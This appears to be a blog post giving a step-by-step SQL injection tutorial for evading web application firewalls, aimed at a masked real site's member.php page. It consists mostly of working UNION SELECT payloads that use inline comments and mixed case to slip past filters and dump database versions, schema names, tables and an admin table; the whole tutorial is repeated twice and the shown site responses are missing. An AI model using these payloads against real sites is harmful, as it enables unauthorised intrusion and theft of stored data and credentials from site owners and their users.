SQL injection; Basic WAF bypass
Assuming you have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)
You do the regular command:
Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5
4,55,56,5 7,58,59,60,61,62--
The website returns this error message:
What you would like to do now is you use inline comments to comment out the blocked commands, like
this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5
4,55,56,5 7,58,59,60,61,62--
And now the website returns this:
Ok now we will try to add version(),database() and user() in one line like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(
),0x3a),5
,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33
,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
7,58,59,6 0,61,62--
The website returns this:
We would now like to make "concat" both upper and lower case letters, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(
),0x3a),5
,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33
,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
7,58,59,6 0,61,62--
The website returns;
Now for the good part; lets try to find all the databases, here is the regular syntax:
Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT
1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22
,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4
6,47,48,4 9,50,51,52,53,54,55,56,57,58,59,60,61,62 from
information_schema.schemata--
But with our new techniques the syntax would look like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22
,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4
6,47,48,4 9,50,51,52,53,54,55,56,57,58,59,60,61,62 from
information_schema.schemata--
The website returns:
now we would like to get the tables:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46
,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62 from
information_schema.tables where table_schema=database()--
The website returns:
Now you have to in some way comment out information_schema or tables, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46
,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62 from
/*!information_schema*/.tables where table_schema=database()--
and this returns:
it's the same to get columns, you know the drill.
If you now want to dump columns id from admin table you do like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
,23,24,25
,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4
9,50,51,5 2,53,54,55,56,57,58,59,60,61,62 from admin--
REMEMBER; This is only BASIC WAF bypass, the techniques are endless
Assuming you have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)
You do the regular command:
Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5
4,55,56,5 7,58,59,60,61,62--
The website returns this error message:
What you would like to do now is you use inline comments to comment out the blocked commands, like
this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5
4,55,56,5 7,58,59,60,61,62--
And now the website returns this:
Ok now we will try to add version(),database() and user() in one line like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(
),0x3a),5
,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33
,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
7,58,59,6 0,61,62--
The website returns this:
We would now like to make "concat" both upper and lower case letters, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(
),0x3a),5
,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33
,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
7,58,59,6 0,61,62--
The website returns;
Now for the good part; lets try to find all the databases, here is the regular syntax:
Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT
1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22
,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4
6,47,48,4 9,50,51,52,53,54,55,56,57,58,59,60,61,62 from
information_schema.schemata--
But with our new techniques the syntax would look like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22
,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4
6,47,48,4 9,50,51,52,53,54,55,56,57,58,59,60,61,62 from
information_schema.schemata--
The website returns:
now we would like to get the tables:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46
,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62 from
information_schema.tables where table_schema=database()--
The website returns:
Now you have to in some way comment out information_schema or tables, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46
,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62 from
/*!information_schema*/.tables where table_schema=database()--
and this returns:
it's the same to get columns, you know the drill.
If you now want to dump columns id from admin table you do like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/
1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
,23,24,25
,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4
9,50,51,5 2,53,54,55,56,57,58,59,60,61,62 from admin--
REMEMBER; This is only BASIC WAF bypass, the techniques are endless
No comments:
Post a Comment